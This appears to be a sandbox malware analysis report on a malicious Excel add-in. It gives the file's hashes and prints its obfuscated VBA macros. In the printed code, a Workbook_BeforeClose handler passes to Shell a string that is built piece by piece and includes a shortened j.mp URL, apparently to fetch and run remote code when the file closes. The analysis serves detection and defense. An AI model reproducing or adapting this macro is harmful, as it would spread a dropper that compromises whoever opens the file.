General

  • Target

    a938f9f04b2c8438690c81fe6de0e116_JaffaCakes118

  • Size

    15KB

  • MD5

    a938f9f04b2c8438690c81fe6de0e116

  • SHA1

    6f372078a4a3cadf2b7bb66442bc7c813d87120a

  • SHA256

    c7e40c5bb07a38e5d072cc4f4fc3eef3b1ebd6e7ed10da6edc637941ca9e5ae3

  • SHA512

    8eaf29c49f1cc33a0a4b9d7218738330dde66c8939ebfba2911c91ebcd1859c31e700b548afda8784cf83d970d13bdbeffd49332501c4e8afc60c60772121475

  • SSDEEP

    384:/br9XuasFux/FltDBIxcoucbF9OCqQd5rgNSTH:fpuasFupjDGcoucbbOCXdxgNSTH

Score
8/10

Malware Config

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

Files

  • a938f9f04b2c8438690c81fe6de0e116_JaffaCakes118
    .xlam office2007

    m

    1
    Attribute VB_Name = "m"
    2
    Function tomala() As String
    3
    lora = "h"
    4
    myralun = lora
    5
    pupu = myralun
    6
    agonlove = "s"
    7
    agonlovefailed = agonlove
    8
    pin = "m"
    9
    topalota = pin
    10
    golopu = topalota

    ThisWorkbook

    1
    Attribute VB_Name = "ThisWorkbook"
    2
    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
    3
    Attribute VB_GlobalNameSpace = False
    4
    Attribute VB_Creatable = False
    5
    Attribute VB_PredeclaredId = True
    6
    Attribute VB_Exposed = True
    7
    Attribute VB_TemplateDerived = False
    8
    Attribute VB_Customizable = True
    9
    Private Sub Workbook_BeforeClose(Cancel As Boolean)
    10
    Shell tomala + kokdasodk

    Sheet1

    1
    Attribute VB_Name = "Sheet1"
    2
    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
    3
    Attribute VB_GlobalNameSpace = False
    4
    Attribute VB_Creatable = False
    5
    Attribute VB_PredeclaredId = True
    6
    Attribute VB_Exposed = True
    7
    Attribute VB_TemplateDerived = False
    8
    Attribute VB_Customizable = True
    9

    Sheet2

    1
    Attribute VB_Name = "Sheet2"
    2
    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
    3
    Attribute VB_GlobalNameSpace = False
    4
    Attribute VB_Creatable = False
    5
    Attribute VB_PredeclaredId = True
    6
    Attribute VB_Exposed = True
    7
    Attribute VB_TemplateDerived = False
    8
    Attribute VB_Customizable = True
    9

    Sheet3

    1
    Attribute VB_Name = "Sheet3"
    2
    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
    3
    Attribute VB_GlobalNameSpace = False
    4
    Attribute VB_Creatable = False
    5
    Attribute VB_PredeclaredId = True
    6
    Attribute VB_Exposed = True
    7
    Attribute VB_TemplateDerived = False
    8
    Attribute VB_Customizable = True
    9

    lk

    1
    Attribute VB_Name = "lk"
    2
    Function kokdasodk() As String
    3
    hotguase = "t"
    4
    polaotos = "p"
    5
    poloots = "h"
    6
    koasmxjw = "s:/"
    7
    kdjkeurg = "/%909123id%909123id%909123id%909123id%909123id@j.mp\kasdasdasasdasddskdd"
    8
    zuoosaod = poloots + hotguase + hotguase + polaotos + koasmxjw + kdjkeurg
    9
    koasdllo = zuoosaod
    10
    kokdasodk = koasdllo

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.